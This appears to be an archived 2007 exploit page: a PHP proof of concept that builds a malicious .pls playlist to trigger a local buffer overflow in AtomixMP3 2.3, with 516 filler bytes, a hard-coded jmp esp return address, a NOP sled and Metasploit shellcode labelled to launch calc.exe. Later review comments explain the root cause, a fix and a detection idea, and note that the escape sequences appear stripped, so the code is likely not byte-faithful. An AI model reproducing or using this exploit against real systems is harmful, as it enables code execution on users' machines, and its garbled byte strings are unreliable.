
atomix23-overflow.txt

Posted on 06 September 2007

<?php
/*
AtomixMP3 2.3 (pls File) Local Buffer OverFlow
ret addr -> 0x77394540 jmp esp in mswsock.dll Winxp Pro Version 2002
exploit : [A x 516] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode ]
By : 0x58
greetz : miyyet,,diablos5s5,,vxroot,,Str0ke,,Metasploit
Moroccan Hackers !
*/

// Review summary (defender's reading of this proof of concept):
//  - The script writes a playlist file, atomix.pls, whose File1 and Title1
//    values are one oversized string ($bof). Per the author's header,
//    AtomixMP3 2.3 copies such an entry into a fixed-size buffer without a
//    length check, so bytes past offset 516 overwrite the saved return
//    address (EIP).
//  - Root cause is the missing bounds check in the player's .pls parser; the
//    fix belongs there (reject or truncate entries longer than the buffer).
//  - The return address is hard-coded for one mswsock.dll build on
//    "Winxp Pro Version 2002". The layout assumes a fixed module address and
//    an executable stack, so it would not be expected to work unchanged where
//    ASLR or DEP applies -- TODO confirm against the affected build.
//  - Detection idea: a .pls file whose File<n>/Title<n> value is far longer
//    than any filesystem path, or contains non-printable bytes, is anomalous
//    and can be flagged before a player opens it.
//  - NOTE(review): the code below is kept exactly as the page shows it. The
//    string literals read as plain text (e.g. "x33xc9") and the fputs()
//    strings end in a space, so the page copy appears to have lost characters
//    in extraction and is likely not byte-faithful to the original file.

# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
// Payload as labelled by the author: a 164-byte encoded block whose stated
// command is calc.exe, i.e. a visible marker that code execution occurred.
$shellcode =
"x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x84".
"xd1xfexd8x83xebxfcxe2xf4x78x39xbaxd8x84xd1x75x9d".
"xb8x5ax82xddxfcxd0x11x53xcbxc9x75x87xa4xd0x15x91".
"x0fxe5x75xd9x6axe0x3ex41x28x55x3exacx83x10x34xd5".
"x85x13x15x2cxbfx85xdaxdcxf1x34x75x87xa0xd0x15xbe".
"x0fxddxb5x53xdbxcdxffx33x0fxcdx75xd9x6fx58xa2xfc".
"x80x12xcfx18xe0x5axbexe8x01x11x86xd4x0fx91xf2x53".
"xf4xcdx53x53xecxd9x15xd1x0fx51x4exd8x84xd1x75xb0".
"xb8x8excfx2exe4x87x77x20x07x11x85x88xecx21x74xdc".
"xdbxb9x66x26x0exdfxa9x27x63xb2x9fxb4xe7xffx9bxa0".
"xe1xd1xfexd8";

// Overlong entry value, in the order the header describes: 516 filler
// characters, the 4-byte return-address field, 10 padding entries, payload.
$bof = str_repeat("A",516)."x40x45x39x77".str_repeat("x90",10).$shellcode;

// Output file name, relative to the script's working directory.
$filename = "atomix.pls";

// "w+" truncates or creates the file. The fopen() result is not checked, so
// a failed open is passed straight to the fputs() calls below.
$file = fopen($filename,"w+");

// Playlist header followed by a single entry; File1 and Title1 both carry
// the same oversized value.
fputs($file,"[playlist] ");
fputs($file,"File1=".$bof." ");
fputs($file,"Title1=".$bof." ");
// Length1 is set to the byte length of $bof.
fputs($file,"Length1=".strlen($bof)." ");
fputs($file,"NumberOfEntries=1");
fputs($file,"Version=2");
fclose($file);

// Status line for the browser; $filename is a fixed literal, not user input.
echo "Exploit generated in : ".$filename."<br>";
?>

 
